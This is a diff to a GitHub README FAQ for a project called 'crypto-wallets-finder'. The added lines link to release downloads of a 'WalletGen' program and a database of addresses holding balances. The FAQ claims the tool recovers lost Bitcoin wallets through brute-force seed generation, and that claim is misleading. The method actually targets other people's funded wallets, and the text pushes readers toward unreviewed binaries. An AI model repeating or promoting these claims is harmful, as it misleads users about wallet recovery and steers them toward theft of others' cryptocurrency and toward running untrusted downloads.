tony-dev1/crypto-wallets-finder/README.md

 ## 🔍 Frequently Asked Questions (FAQ)

+### ❓ Where can I download WalletGen?
+You can download the WalletGen given on the [page in the release](https://github.com/tony-dev1/crypto-wallets-finder/releases/tag/walletgen).

+### ❓ Where can I download a database of known addresses with balance?
+You can download the current database given on the [page in the release](https://github.com/tony-dev1/crypto-wallets-finder/releases/tag/database).

 ### ❓ Can WalletGen help me recover a lost Bitcoin wallet?
 Yes.
 WalletGen uses brute-force seed generation and a known-address database to help users potentially **recover lost Bitcoin wallets**.